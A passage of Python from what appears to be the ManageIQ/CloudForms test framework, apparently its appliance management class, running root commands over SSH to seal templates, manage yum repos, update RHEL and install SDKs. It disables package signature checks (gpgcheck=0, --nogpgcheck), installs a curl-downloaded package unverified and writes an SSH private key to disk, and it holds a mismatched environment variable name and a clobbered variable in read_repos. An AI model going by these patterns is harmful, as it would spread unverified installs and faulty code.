restart_evm = True
if restart_evm:
self.restart_evm_service(log_callback=log_callback)
self.wait_for_web_ui(timeout=1800, log_callback=log_callback)
def configure_gce(self, log_callback=None):
# Force use of IPAppliance's configure method
return IPAppliance.configure(self, on_gce=True)
def seal_for_templatizing(self):
"""Prepares the VM to be "generalized" for saving as a template."""
with self.ssh_client as ssh_client:
# Seals the VM in order to work when spawned again.
ssh_client.run_command("rm -rf /etc/ssh/ssh_host_*", ensure_host=True)
if ssh_client.run_command(
"grep '^HOSTNAME' /etc/sysconfig/network", ensure_host=True).success:
# Replace it
ssh_client.run_command(
"sed -i -r -e 's/^HOSTNAME=.*$/HOSTNAME=localhost.localdomain/' "
"/etc/sysconfig/network", ensure_host=True)
else:
# Set it
ssh_client.run_command(
"echo HOSTNAME=localhost.localdomain >> /etc/sysconfig/network",
ensure_host=True)
ssh_client.run_command(
"sed -i -r -e '/^HWADDR/d' /etc/sysconfig/network-scripts/ifcfg-eth0",
ensure_host=True)
ssh_client.run_command(
"sed -i -r -e '/^UUID/d' /etc/sysconfig/network-scripts/ifcfg-eth0",
ensure_host=True)
ssh_client.run_command("rm -f /etc/udev/rules.d/70-*", ensure_host=True)
# Fix SELinux things
ssh_client.run_command("restorecon -R /etc/sysconfig/network-scripts", ensure_host=True)
ssh_client.run_command("restorecon /etc/sysconfig/network", ensure_host=True)
# Stop the evmserverd and move the logs somewhere
ssh_client.run_command("systemctl stop evmserverd", ensure_host=True)
ssh_client.run_command("mkdir -p /var/www/miq/vmdb/log/preconfigure-logs",
ensure_host=True)
ssh_client.run_command(
"mv /var/www/miq/vmdb/log/*.log /var/www/miq/vmdb/log/preconfigure-logs/",
ensure_host=True)
ssh_client.run_command(
"mv /var/www/miq/vmdb/log/*.gz /var/www/miq/vmdb/log/preconfigure-logs/",
ensure_host=True)
# Reduce swapping, because it can do nasty things to our providers
ssh_client.run_command('echo "vm.swappiness = 1" >> /etc/sysctl.conf',
ensure_host=True)
def _encrypt_string(self, string):
try:
# Let's not log passwords
logging.disable(logging.CRITICAL)
result = self.ssh_client.run_rails_command(
"\"puts MiqPassword.encrypt('{}')\"".format(string))
return result.output.strip()
finally:
logging.disable(logging.NOTSET)
@property
def managed_provider_names(self):
"""Returns a list of names for all providers configured on the appliance
Note:
Unlike ``managed_known_providers``, this will also return names of providers that were
not recognized, but are present.
"""
known_ems_list = []
for ems in self.rest_api.collections.providers:
if not any(
p_type in ems['type'] for p_type in RECOGNIZED_BY_IP + RECOGNIZED_BY_CREDS):
continue
known_ems_list.append(ems['name'])
return known_ems_list
@property
def managed_known_providers(self):
"""Returns a set of provider crud objects of known providers managed by this appliance
Note:
Recognized by name only.
"""
from cfme.utils.providers import list_providers
prov_cruds = list_providers(use_global_filters=False)
found_cruds = set()
unrecognized_ems_names = set()
for ems_name in self.managed_provider_names:
for prov in prov_cruds:
# Name check is authoritative and the only proper way to recognize a known provider
if ems_name == prov.name:
found_cruds.add(prov)
break
else:
unrecognized_ems_names.add(ems_name)
if unrecognized_ems_names:
self.log.warning(
"Unrecognized managed providers: {}".format(', '.join(unrecognized_ems_names)))
return list(found_cruds)
@classmethod
def from_url(cls, url, **kwargs):
"""Create an appliance instance from a URL.
Supported format using a simple regexp expression:
``(https?://)?hostname_or_ip(:port)?/?``
Args:
url: URL to be parsed from
**kwargs: For setting and overriding the params parsed from the URL
Returns:
A :py:class:`IPAppliance` instance.
"""
if not isinstance(url, six.string_types):
raise TypeError('url for .from_url must be a string')
parsed = urlparse(url)
new_kwargs = {}
if parsed.netloc:
host_part = parsed.netloc
elif parsed.path and not parsed.netloc:
# If you only pass the hostname (+ port possibly) without scheme or anything else
host_part = parsed.path
else:
raise ValueError('Unsupported url specification: {}'.format(url))
if ':' in host_part:
hostname, port = host_part.rsplit(':', 1)
port = int(port)
else:
hostname = host_part
if parsed.scheme:
port = cls.PROTOCOL_PORT_MAPPING[parsed.scheme]
else:
port = None
new_kwargs['hostname'] = hostname
if port is not None:
new_kwargs['ui_port'] = port
if parsed.scheme:
new_kwargs['ui_protocol'] = parsed.scheme
new_kwargs.update(kwargs)
return cls(**new_kwargs)
def new_rest_api_instance(
self, entry_point=None, auth=None, logger="default", verify_ssl=False):
"""Returns new REST API instance."""
return MiqApi(
entry_point=entry_point or self.url_path('/api'),
auth=auth or (conf.credentials["default"]["username"],
conf.credentials["default"]["password"]),
logger=self.rest_logger if logger == "default" else logger,
verify_ssl=verify_ssl)
@cached_property
def rest_api(self):
return self.new_rest_api_instance()
@cached_property
def miqqe_version(self):
"""Returns version of applied JS patch or None if not present"""
result = self.ssh_client.run_command('grep "[0-9]\+" /var/www/miq/vmdb/.miqqe_version')
if result.success:
return int(result.output)
return None
@property
def url(self):
"""Returns a proper URL of the appliance.
If the ports do not correspond the protocols' default port numbers, then the ports are
explicitly specified as well.
"""
show_port = self.PROTOCOL_PORT_MAPPING[self.ui_protocol] != self.ui_port
if show_port:
return '{}://{}:{}/'.format(self.ui_protocol, self.hostname, self.ui_port)
else:
return '{}://{}/'.format(self.ui_protocol, self.hostname)
def url_path(self, path):
"""generates URL with an additional path. Useful for generating REST or SSUI URLs."""
return '{}/{}'.format(self.url.rstrip('/'), path.lstrip('/'))
@property
def disks_and_partitions(self):
"""Returns list of all disks and partitions"""
disks_and_partitions = self.ssh_client.run_command(
"ls -1 /dev/ | egrep '^[sv]d[a-z][0-9]?'").output.strip()
disks_and_partitions = re.split(r'\s+', disks_and_partitions)
return sorted('/dev/{}'.format(disk) for disk in disks_and_partitions)
@property
def disks(self):
"""Returns list of disks only, excludes their partitions"""
disk_regexp = re.compile('^/dev/[sv]d[a-z]$')
return [
disk for disk in self.disks_and_partitions
if disk_regexp.match(disk)
]
@property
def unpartitioned_disks(self):
"""Returns list of any disks that have no partitions"""
partition_regexp = re.compile('^/dev/[sv]d[a-z][0-9]$')
unpartitioned_disks = set()
for disk in self.disks:
add = True
for dp in self.disks_and_partitions:
if dp.startswith(disk) and partition_regexp.match(dp) is not None:
add = False
if add:
unpartitioned_disks.add(disk)
return sorted(disk for disk in unpartitioned_disks)
@cached_property
def product_name(self):
try:
return self.rest_api.product_info['name']
except (AttributeError, KeyError, IOError):
self.log.exception(
'appliance.product_name could not be retrieved from REST, falling back')
try:
# TODO: Review this section. Does not work unconfigured
# # We need to print to a file here because the deprecation warnings make it hard
# # to get robust output and they do not seem to go to stderr
# result = self.ssh_client.run_rails_command(
# '"File.open(\'/tmp/product_name.txt\', \'w\') '
# '{|f| f.write(I18n.t(\'product.name\')) }"')
# result = self.ssh_client.run_command('cat /tmp/product_name.txt')
# return result.output
res = self.ssh_client.run_command('cat /etc/redhat-release')
if res.failed:
raise RuntimeError('Unable to retrieve /etc/redhat-release')
version_string = res.output.strip()
if 'CentOS' in version_string:
return 'ManageIQ'
else:
return 'CFME'
except Exception:
logger.exception(
"Couldn't fetch the product name from appliance, using ManageIQ as default")
return 'ManageIQ'
@cached_property
def is_downstream(self):
return self.product_name == 'CFME'
@cached_property
def version(self):
try:
return Version(self.rest_api.server_info['version'])
except (AttributeError, KeyError, IOError, APIException):
self.log.exception('appliance.version could not be retrieved from REST, falling back')
return self.ssh_client.vmdb_version
@cached_property
def build(self):
if not self.is_downstream:
return 'master'
try:
return self.rest_api.server_info['build']
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.build could not be retrieved from REST, falling back')
res = self.ssh_client.run_command('cat /var/www/miq/vmdb/BUILD')
if res.failed:
raise RuntimeError('Unable to retrieve appliance VMDB version')
return res.output.strip("\n")
@cached_property
def os_version(self):
# Currently parses the os version out of redhat release file to allow for
# rhel and centos appliances
res = self.ssh_client.run_command(
r"cat /etc/redhat-release | sed 's/.* release \(.*\) (.*/\1/' #)")
if res.failed:
raise RuntimeError('Unable to retrieve appliance OS version')
return Version(res.output)
@cached_property
def log(self):
return create_sublogger(self.hostname)
@cached_property
def coverage(self):
return ui_coverage.CoverageManager(self)
def ssh_client_with_privatekey(self):
with open(conf_path.join('appliance_private_key').strpath, 'w') as key:
key.write(conf.credentials['ssh']['private_key'])
connect_kwargs = {
'hostname': self.hostname,
'username': conf.credentials['ssh']['ssh-user'],
'key_filename': conf_path.join('appliance_private_key').strpath,
}
ssh_client = ssh.SSHClient(**connect_kwargs)
# FIXME: properly store ssh clients we made
store.ssh_clients_to_close.append(ssh_client)
return ssh_client
@cached_property
def ssh_client(self):
"""Creates an ssh client connected to this appliance
Returns: A configured :py:class:``utils.ssh.SSHClient`` instance.
Usage:
with appliance.ssh_client as ssh:
result = ssh.run_command('...')
Note:
The credentials default to those found under ``ssh`` key in ``credentials.yaml``.
"""
if not self.is_ssh_running:
raise Exception('SSH is unavailable')
# IPAppliance.ssh_client only connects to its address
if self.openshift_creds:
connect_kwargs = {
'hostname': self.openshift_creds['hostname'],
'username': self.openshift_creds['ssh']['username'],
'password': self.openshift_creds['ssh']['password'],
'oc_username': self.openshift_creds['username'],
'oc_password': self.openshift_creds['password'],
'container': self.container,
'is_pod': self.is_pod,
'port': self.ssh_port,
'project': self.project
}
else:
connect_kwargs = {
'hostname': self.hostname,
'username': conf.credentials['ssh']['username'],
'password': conf.credentials['ssh']['password'],
'container': self.container,
'is_pod': self.is_pod,
'port': self.ssh_port,
}
if self.is_dev:
connect_kwargs.update({'is_dev': True})
ssh_client = ssh.SSHClient(**connect_kwargs)
try:
ssh_client.get_transport().is_active()
logger.info('default appliance ssh credentials are valid')
except Exception as e:
if self.is_dev:
raise Exception('SSH access on a dev alliance, (unsupported)')
logger.error(e)
logger.error('default appliance ssh credentials failed, trying establish ssh connection'
' using ssh private key')
ssh_client = self.ssh_client_with_privatekey()
# FIXME: properly store ssh clients we made
store.ssh_clients_to_close.append(ssh_client)
return ssh_client
@property
def swap(self):
"""Retrieves the value of swap for the appliance. Might raise an exception if SSH fails.
Return:
An integer value of swap in the VM in megabytes. If ``None`` is returned, it means it
was not possible to parse the command output.
Raises:
:py:class:`paramiko.ssh_exception.SSHException` or :py:class:`socket.error`
"""
try:
server = self.rest_api.get_entity_by_href(self.rest_api.server_info['server_href'])
return server.system_swap_used / 1024 / 1024
except (AttributeError, KeyError, IOError):
self.log.exception('appliance.swap could not be retrieved from REST, falling back')
value = self.ssh_client.run_command(
'free -m | tr -s " " " " | cut -f 3 -d " " | tail -n 1', reraise=True, timeout=15)
try:
value = int(value.output.strip())
except (TypeError, ValueError):
value = None
return value
def event_listener(self):
"""Returns an instance of the event listening class pointed to this appliance."""
# There is no REST API for event streams on versions < 5.9
if self.version <= '5.9':
from cfme.utils.events_db import DbEventListener
return DbEventListener(self)
else:
from cfme.utils.events import RestEventListener
return RestEventListener(self)
def diagnose_evm_failure(self):
"""Go through various EVM processes, trying to figure out what fails
Returns: A string describing the error, or None if no errors occurred.
This is intended to be run after an appliance is configured but failed for some reason,
such as in the template tester.
"""
logger.info('Diagnosing EVM failures, this can take a while...')
if not self.hostname:
return 'appliance has no IP Address; provisioning failed or networking is broken'
logger.info('Checking appliance SSH Connection')
if not self.is_ssh_running:
return 'SSH is not running on the appliance'
# Now for the DB
logger.info('Checking appliance database')
if not self.db.online:
# postgres isn't running, try to start it
cmd = 'systemctl restart {}-postgresql'.format(self.db.postgres_version)
result = self.db.ssh_client.run_command(cmd)
if result.failed:
return 'postgres failed to start:\n{}'.format(result.output)
else:
return 'postgres was not running for unknown reasons'
if not self.db.has_database:
return 'vmdb_production database does not exist'
if not self.db.has_tables:
return 'vmdb_production has no tables'
# try to start EVM
logger.info('Checking appliance evmserverd service')
try:
self.restart_evm_service()
except ApplianceException as ex:
return 'evmserverd failed to start:\n{}'.format(ex.args[0])
# This should be pretty comprehensive, but we might add some net_checks for
# 3000, 4000, and 80 at this point, and waiting a reasonable amount of time
# before exploding if any of them don't appear in time after evm restarts.
@logger_wrap("Fix NTP Clock: {}")
def fix_ntp_clock(self, log_callback=None):
"""Fixes appliance time using ntpdate on appliance"""
log_callback('Fixing appliance clock')
client = self.ssh_client
# checking whether chrony is installed
check_cmd = 'yum list installed chrony'
if client.run_command(check_cmd).failed:
raise ApplianceException("Chrony isn't installed")
# # checking whether it is enabled and enable it
is_enabled_cmd = 'systemctl is-enabled chronyd'
if client.run_command(is_enabled_cmd).failed:
logger.debug("chrony will start on system startup")
client.run_command('systemctl enable chronyd')
client.run_command('systemctl daemon-reload')
# Retrieve time servers from yamls
server_template = 'server {srv} iburst'
time_servers = set()
try:
logger.debug('obtaining clock servers from config file')
clock_servers = conf.cfme_data.get('clock_servers')
for clock_server in clock_servers:
time_servers.add(server_template.format(srv=clock_server))
except TypeError:
msg = 'No clock servers configured in cfme_data.yaml'
log_callback(msg)
raise ApplianceException(msg)
filename = '/etc/chrony.conf'
chrony_conf = set(client.run_command("cat {f}".format(f=filename)).output.strip()
.split('\n'))
modified_chrony_conf = chrony_conf.union(time_servers)
if modified_chrony_conf != chrony_conf:
modified_chrony_conf = "\n".join(list(modified_chrony_conf))
client.run_command('echo "{txt}" > {f}'.format(txt=modified_chrony_conf, f=filename))
logger.info("chrony's config file updated")
conf_file_updated = True
else:
logger.info("chrony's config file hasn't been changed")
conf_file_updated = False
if conf_file_updated or client.run_command('systemctl status chronyd').failed:
logger.debug('restarting chronyd')
client.run_command('systemctl restart chronyd')
# check that chrony is running correctly now
result = client.run_command('chronyc tracking')
if result.success:
logger.info('chronyc is running correctly')
else:
raise ApplianceException("chrony doesn't work. "
"Error message: {e}".format(e=result.output))
@property
def is_miqqe_patch_candidate(self):
return self.version < "5.6.3"
@property
def miqqe_patch_applied(self):
return self.miqqe_version == current_miqqe_version
@logger_wrap("Patch appliance with MiqQE js: {}")
def patch_with_miqqe(self, log_callback=None):
# (local_path, remote_path, md5/None) trio
autofocus_patch = pick({
'5.5': 'autofocus.js.diff',
'5.7': 'autofocus_57.js.diff'
})
patch_args = (
(str(patches_path.join('miq_application.js.diff')),
'/var/www/miq/vmdb/app/assets/javascripts/miq_application.js',
None),
(str(patches_path.join(autofocus_patch)),
'/var/www/miq/vmdb/app/assets/javascripts/directives/autofocus.js',
None),
)
for local_path, remote_path, md5 in patch_args:
self.ssh_client.patch_file(local_path, remote_path, md5)
self.precompile_assets()
self.restart_evm_service()
logger.info("Waiting for Web UI to start")
wait_for(
func=self.is_web_ui_running,
message='appliance.is_web_ui_running',
delay=20,
timeout=300)
logger.info("Web UI is up and running")
self.ssh_client.run_command(
"echo '{}' > /var/www/miq/vmdb/.miqqe_version".format(current_miqqe_version))
# Invalidate cached version
del self.miqqe_version
@logger_wrap("Work around missing Gem file: {}")
def workaround_missing_gemfile(self, log_callback=None):
"""Fix Gemfile issue.
Early 5.4 builds have issues with Gemfile not present (BUG 1191496). This circumvents the
issue with pointing the env variable that Bundler uses to get the Gemfile to the Gemfile in
vmdb which *should* be correct.
When this issue is resolved, this method will do nothing.
"""
client = self.ssh_client
result = client.run_command("ls /opt/rh/cfme-gemset")
if result.failed:
return # Not needed
log_callback('Fixing Gemfile issue')
# Check if the error is there
result = client.run_rails_command("puts 1")
if result.success:
return # All OK!
client.run_command('echo "export BUNDLE_GEMFILE=/var/www/miq/vmdb/Gemfile" >> /etc/bashrc')
# To be 100% sure
self.reboot(wait_for_web_ui=False, log_callback=log_callback)
@logger_wrap("Precompile assets: {}")
def precompile_assets(self, log_callback=None):
"""Precompile the static assets (images, css, etc) on an appliance
"""
log_callback('Precompiling assets')
client = self.ssh_client
store.terminalreporter.write_line('Precompiling assets')
store.terminalreporter.write_line(
'THIS IS NOT STUCK. Just wait until it\'s done, it will be only done once', red=True)
store.terminalreporter.write_line('Phase 1 of 2: rake assets:clobber')
result = client.run_rake_command("assets:clobber")
if result.failed:
msg = 'Appliance {} failed to nuke old assets'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
store.terminalreporter.write_line('Phase 2 of 2: rake assets:precompile')
result = client.run_rake_command("assets:precompile")
if result.failed:
msg = 'Appliance {} failed to precompile assets'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
store.terminalreporter.write_line('Asset precompilation done')
return result.rc
@logger_wrap("Clone automate domain: {}")
def clone_domain(self, source="ManageIQ", dest="Default", log_callback=None):
"""Clones Automate domain
Args:
src: Source domain name.
dst: Destination domain name.
"""
client = self.ssh_client
# Make sure the database is ready
log_callback('Waiting for database')
self.db.wait_for()
# Make sure the working dir exists
client.run_command('mkdir -p /tmp/{}'.format(source))
export_opts = 'DOMAIN={} EXPORT_DIR=/tmp/{} PREVIEW=false OVERWRITE=true'.format(source,
source)
export_cmd = 'evm:automate:export {}'.format(export_opts)
log_callback('Exporting domain ({}) ...'.format(export_cmd))
result = client.run_rake_command(export_cmd)
if result.failed:
msg = 'Failed to export {} domain'.format(source)
log_callback(msg)
raise ApplianceException(msg)
ro_fix_cmd = ("sed -i 's/system: true/system: false/g' "
"/tmp/{}/{}/__domain__.yaml".format(source, source))
result = client.run_command(ro_fix_cmd)
if result.failed:
msg = 'Setting {} domain to read/write failed'.format(dest)
log_callback(msg)
raise ApplianceException(msg)
import_opts = 'DOMAIN={} IMPORT_DIR=/tmp/{} PREVIEW=false'.format(source, source)
import_opts += ' OVERWRITE=true IMPORT_AS={} ENABLED=true'.format(dest)
import_cmd = 'evm:automate:import {}'.format(import_opts)
log_callback('Importing domain ({}) ...'.format(import_cmd))
result = client.run_rake_command(import_cmd)
if result.failed:
msg = 'Failed to import {} domain'.format(dest)
log_callback(msg)
raise ApplianceException(msg)
return result.rc, result.output
@logger_wrap("Deploying Merkyl: {}")
def deploy_merkyl(self, start=False, log_callback=None):
"""Deploys the Merkyl log relay service to the appliance"""
client = self.ssh_client
client.run_command('mkdir -p /root/merkyl')
for filename in ['__init__.py', 'merkyl.tpl', ('bottle.py.dontflake', 'bottle.py'),
'allowed.files']:
try:
src, dest = filename
except (TypeError, ValueError):
# object is not iterable or too many values to unpack
src = dest = filename
log_callback('Sending {} to appliance'.format(src))
client.put_file(data_path.join(
'bundles', 'merkyl', src).strpath, os.path.join('/root/merkyl', dest))
client.put_file(data_path.join(
'bundles', 'merkyl', 'merkyl').strpath, os.path.join('/etc/init.d/merkyl'))
client.run_command('chmod 775 /etc/init.d/merkyl')
client.run_command(
'/bin/bash -c \'if ! [[ $(iptables -L -n | grep "state NEW tcp dpt:8192") ]]; then '
'iptables -I INPUT 6 -m state --state NEW -m tcp -p tcp --dport 8192 -j ACCEPT; fi\'')
if start:
log_callback("Starting ...")
client.run_command('systemctl restart merkyl')
log_callback("Setting it to start after reboot")
client.run_command("chkconfig merkyl on")
def get_repofile_list(self):
"""Returns list of repofiles present at the appliance.
Ignores certain files, like redhat.repo.
"""
repofiles = self.ssh_client.run_command('ls /etc/yum.repos.d').output.strip().split('\n')
return [f for f in repofiles if f not in {"redhat.repo"} and f.endswith(".repo")]
def read_repos(self):
"""Reads repofiles so it gives you mapping of id and url."""
result = {}
name_regexp = re.compile(r"^\[update-([^\]]+)\]")
baseurl_regexp = re.compile(r"baseurl\s*=\s*([^\s]+)")
for repofile in self.get_repofile_list():
result = self.ssh_client.run_command("cat /etc/yum.repos.d/{}".format(repofile))
if result.failed:
# Something happened meanwhile?
continue
out = result.output.strip()
name_match = name_regexp.search(out)
if name_match is None:
continue
baseurl_match = baseurl_regexp.search(out)
if baseurl_match is None:
continue
result[name_match.groups()[0]] = baseurl_match.groups()[0]
return result
# Regexp that looks for product type and version in the update URL
product_url_regexp = re.compile(
r"/((?:[A-Z]+|CloudForms|rhel|RHEL_Guest))(?:-|/|/server/)(\d+[^/]*)/")
def find_product_repos(self):
"""Returns a dictionary of products, where the keys are names of product (repos) and values
are dictionaries where keys are the versions and values the names of the repositories.
"""
products = {}
for repo_name, repo_url in self.read_repos().items():
match = self.product_url_regexp.search(repo_url)
if match is None:
continue
product, ver = match.groups()
if product not in products:
products[product] = {}
products[product][ver] = repo_name
return products
def write_repofile(self, repo_id, repo_url, **kwargs):
"""Wrapper around writing a repofile. You can specify conf options in kwargs."""
if "gpgcheck" not in kwargs:
kwargs["gpgcheck"] = 0
if "enabled" not in kwargs:
kwargs["enabled"] = 1
filename = "/etc/yum.repos.d/{}.repo".format(repo_id)
logger.info("Writing a new repofile %s %s", repo_id, repo_url)
self.ssh_client.run_command('echo "[update-{}]" > {}'.format(repo_id, filename))
self.ssh_client.run_command('echo "name=update-url-{}" >> {}'.format(repo_id, filename))
self.ssh_client.run_command('echo "baseurl={}" >> {}'.format(repo_url, filename))
for k, v in kwargs.items():
self.ssh_client.run_command('echo "{}={}" >> {}'.format(k, v, filename))
return repo_id
def add_product_repo(self, repo_url, **kwargs):
"""This method ensures that when we add a new repo URL, there will be no other version
of such product present in the yum.repos.d. You can specify conf options in kwargs. They
will be applied only to newly created repo file.
Returns:
The repo id.
"""
match = self.product_url_regexp.search(repo_url)
if match is None:
raise ValueError(
"The URL {} does not contain information about product and version.".format(
repo_url))
for repo_id, url in self.read_repos().items():
if url == repo_url:
# It is already there, so just enable it
self.enable_disable_repo(repo_id, True)
return repo_id
product, ver = match.groups()
repos = self.find_product_repos()
if product in repos:
for v, i in repos[product].items():
logger.info("Deleting %s repo with version %s (%s)", product, v, i)
self.ssh_client.run_command("rm -f /etc/yum.repos.d/{}.repo".format(i))
return self.write_repofile(fauxfactory.gen_alpha(), repo_url, **kwargs)
def enable_disable_repo(self, repo_id, enable):
logger.info("%s repository %s", "Enabling" if enable else "Disabling", repo_id)
return self.ssh_client.run_command(
"sed -i 's/^enabled=./enabled={}/' /etc/yum.repos.d/{}.repo".format(
1 if enable else 0, repo_id)).success
@logger_wrap("Update RHEL: {}")
def update_rhel(self, *urls, **kwargs):
"""Update RHEL on appliance
Will pull URLs from the 'updates_urls' environment variable (whitespace-separated URLs),
or cfme_data.
If the env var is not set, URLs will be pulled from cfme_data.
If the env var is set, it is the only source for update URLs.
Generic rhel update URLs cfme_data.get('basic_info', {})['rhel_updates_urls'] (yaml list)
On downstream builds, an additional RH SCL updates url can be inserted at
cfme_data.get('basic_info', {})['rhscl_updates_urls'].
If the ``skip_broken`` kwarg is passed, and evaluated as True, broken packages will be
ignored in the yum update.
"""
urls = list(urls)
log_callback = kwargs.pop("log_callback")
skip_broken = kwargs.pop("skip_broken", False)
reboot = kwargs.pop("reboot", True)
streaming = kwargs.pop("streaming", False)
cleanup = kwargs.pop('cleanup', False)
log_callback('updating appliance')
if not urls:
basic_info = conf.cfme_data.get('basic_info', {})
if os.environ.get('updates_urls'):
# try to pull URLs from env if var is non-empty
urls.extend(os.environ['update_urls'].split())
else:
# fall back to cfme_data
updates_url = basic_info.get('rhel7_updates_url')
if updates_url:
urls.append(updates_url)
if streaming:
client = self.ssh_client(stream_output=True)
else:
client = self.ssh_client
if cleanup:
client.run_command(
"cd /etc/yum.repos.d && find . -not -name 'redhat.repo' "
"-not -name 'rhel-source.repo' -not -name . -exec rm {} \;")
for url in urls:
self.add_product_repo(url)
# update
log_callback('Running rhel updates on appliance')
# clean yum beforehand to clear metadata from earlier update repos, if any
try:
skip = '--skip-broken' if skip_broken else ''
result = client.run_command('yum update -y --nogpgcheck {}'.format(skip),
timeout=3600)
except socket.timeout:
msg = 'SSH timed out while updating appliance, exiting'
log_callback(msg)
# failure to update is fatal, kill this process
raise KeyboardInterrupt(msg)
self.log.error(result.output)
if result.failed:
self.log.error('appliance update failed')
msg = 'Appliance {} failed to update RHEL, error in logs'.format(self.hostname)
log_callback(msg)
raise ApplianceException(msg)
if reboot:
self.reboot(wait_for_web_ui=False, log_callback=log_callback)
return result
def utc_time(self):
client = self.ssh_client
result = client.run_command('date --iso-8601=seconds -u')
if result.success:
return dateutil.parser.parse(result.output)
else:
raise Exception("Couldn't get datetime: {}".format(result.output))
def _check_appliance_ui_wait_fn(self):
# Get the URL, don't verify ssl cert
try:
response = requests.get(self.url, timeout=15, verify=False)
if response.status_code == 200:
self.log.info("Appliance online")
return True
else:
self.log.debug('Appliance online, status code %s', response.status_code)
except requests.exceptions.Timeout:
self.log.debug('Appliance offline, connection timed out')
except ValueError:
# requests exposes invalid URLs as ValueErrors, which is excellent
raise
except Exception as ex:
self.log.debug('Appliance online, but connection failed: %s', str(ex))
return False
def is_web_ui_running(self, unsure=False):
"""Triple checks if web UI is up and running
Args:
unsure: Variable to return when not sure if web UI is running or not
(default ``False``)
"""
num_of_tries = 3
was_running_count = 0
for try_num in range(num_of_tries):
if self._check_appliance_ui_wait_fn():
was_running_count += 1
sleep(3)
if was_running_count == 0:
return False
elif was_running_count == num_of_tries:
return True
else:
return unsure
def _evm_service_command(self, command, log_callback, expected_exit_code=None):
"""Runs given systemctl command against the ``evmserverd`` service
Args:
command: Command to run, e.g. "start"
expected_exit_code: If the exit codes don't match, ApplianceException is raised
"""
log_callback("Running command '{}' against the evmserverd service".format(command))
with self.ssh_client as ssh:
result = ssh.run_command('systemctl {} evmserverd'.format(command))
if expected_exit_code is not None and result.rc != expected_exit_code:
msg = ('Failed to {} evmserverd on {}\nError: {}'
.format(command, self.hostname, result.output))
log_callback(msg)
raise ApplianceException(msg)
return result.rc
@logger_wrap("Status of EVM service: {}")
def is_evm_service_running(self, log_callback=None):
"""Checks the ``evmserverd`` service status on this appliance
"""
return self._evm_service_command("status", log_callback=log_callback) == 0
@logger_wrap("Start EVM Service: {}")
def start_evm_service(self, log_callback=None):
"""Starts the ``evmserverd`` service on this appliance
"""
self._evm_service_command('start', expected_exit_code=0, log_callback=log_callback)
@logger_wrap("Stop EVM Service: {}")
def stop_evm_service(self, log_callback=None):
"""Stops the ``evmserverd`` service on this appliance
"""
self._evm_service_command('stop', expected_exit_code=0, log_callback=log_callback)
@logger_wrap("Restart EVM Service: {}")
def restart_evm_service(self, rude=False, log_callback=None):
"""Restarts the ``evmserverd`` service on this appliance
"""
store.terminalreporter.write_line('evmserverd is being restarted, be patient please')
with self.ssh_client as ssh:
if rude:
self.evmserverd.stop()
log_callback('Waiting for evm service to stop')
try:
wait_for(
self.is_evm_service_running, num_sec=120, fail_condition=True, delay=10,
message='evm service to stop')
except TimedOutError:
# Don't care if it's still running
pass
log_callback('killing any remaining processes and restarting postgres')
ssh.run_command(
'killall -9 ruby; systemctl restart {}-postgresql'
.format(self.db.postgres_version))
log_callback('Waiting for database to be available')
wait_for(
lambda: self.db.is_online, num_sec=90, delay=10, fail_condition=False,
message="database to be available")
self.evmserverd.start()
else:
self.evmserverd.restart()
@logger_wrap("Waiting for EVM service: {}")
def wait_for_evm_service(self, timeout=900, log_callback=None):
"""Waits for the evemserverd service to be running
Args:
timeout: Number of seconds to wait until timeout (default ``900``)
"""
log_callback('Waiting for evmserverd to be running')
result, wait = wait_for(self.is_evm_service_running, num_sec=timeout,
fail_condition=False, delay=10)
return result
@logger_wrap("Rebooting Appliance: {}")
def reboot(self, wait_for_web_ui=True, log_callback=None):
log_callback('Rebooting appliance')
client = self.ssh_client
old_uptime = client.uptime()
client.run_command('reboot')
wait_for(lambda: client.uptime() < old_uptime, handle_exception=True,
num_sec=600, message='appliance to reboot', delay=10)
if wait_for_web_ui:
self.wait_for_web_ui()
@logger_wrap("Waiting for web_ui: {}")
def wait_for_web_ui(self, timeout=900, running=True, log_callback=None):
"""Waits for the web UI to be running / to not be running
Args:
timeout: Number of seconds to wait until timeout (default ``600``)
running: Specifies if we wait for web UI to start or stop (default ``True``)
``True`` == start, ``False`` == stop
"""
prefix = "" if running else "dis"
(log_callback or self.log.info)('Waiting for web UI to ' + prefix + 'appear')
result, wait = wait_for(self._check_appliance_ui_wait_fn, num_sec=timeout,
fail_condition=not running, delay=10)
return result
@logger_wrap("Install VDDK: {}")
def install_vddk(self, force=False, vddk_url=None, log_callback=None):
"""Install the vddk on a appliance"""
def log_raise(exception_class, message):
log_callback(message)
raise exception_class(message)
if vddk_url is None: # fallback to VDDK 5.5
vddk_url = conf.cfme_data.get("basic_info", {}).get("vddk_url", {}).get("v5_5")
if vddk_url is None:
raise Exception("vddk_url not specified!")
with self.ssh_client as client:
is_already_installed = False
if client.run_command('test -d /usr/lib/vmware-vix-disklib/lib64').success:
is_already_installed = True
if not is_already_installed or force:
# start
filename = vddk_url.split('/')[-1]
# download
log_callback('Downloading VDDK')
result = client.run_command('curl {} -o {}'.format(vddk_url, filename))
if result.failed:
log_raise(Exception, "Could not download VDDK")
# install
log_callback('Installing vddk')
result = client.run_command(
'yum -y install {}'.format(filename))
if result.failed:
log_raise(
Exception,
'VDDK installation failure (rc: {})\n{}'.format(result.rc, result.output)
)
# verify
log_callback('Verifying vddk')
result = client.run_command('ldconfig -p | grep vix')
if len(result.output) < 2:
log_raise(
Exception,
"Potential installation issue, libraries not detected\n{}"
.format(result.output)
)
@logger_wrap("Uninstall VDDK: {}")
def uninstall_vddk(self, log_callback=None):
"""Uninstall the vddk from an appliance"""
with self.ssh_client as client:
is_installed = client.run_command('test -d /usr/lib/vmware-vix-disklib/lib64').success
if is_installed:
result = client.run_command('yum -y remove vmware-vix-disklib')
if result.failed:
log_callback('VDDK removing failure (rc: {})\n{}'
.format(result.rc, result.output))
raise Exception('VDDK removing failure (rc: {})\n{}'
.format(result.rc, result.output))
else:
log_callback('VDDK has been successfully removed.')
else:
log_callback('VDDK is not installed.')
@logger_wrap("Install Netapp SDK: {}")
def install_netapp_sdk(self, sdk_url=None, reboot=False, log_callback=None):
"""Installs the Netapp SDK.
Args:
sdk_url: Where the SDK zip file is located? (optional)
reboot: Whether to reboot the appliance afterwards? (Default False but reboot is needed)
"""
def log_raise(exception_class, message):
log_callback(message)
raise exception_class(message)
if sdk_url is None:
try:
sdk_url = conf.cfme_data['basic_info']['netapp_sdk_url']
except KeyError:
raise Exception("cfme_data.yaml/basic_info/netapp_sdk_url is not present!")
filename = sdk_url.split('/')[-1]
foldername = os.path.splitext(filename)[0]
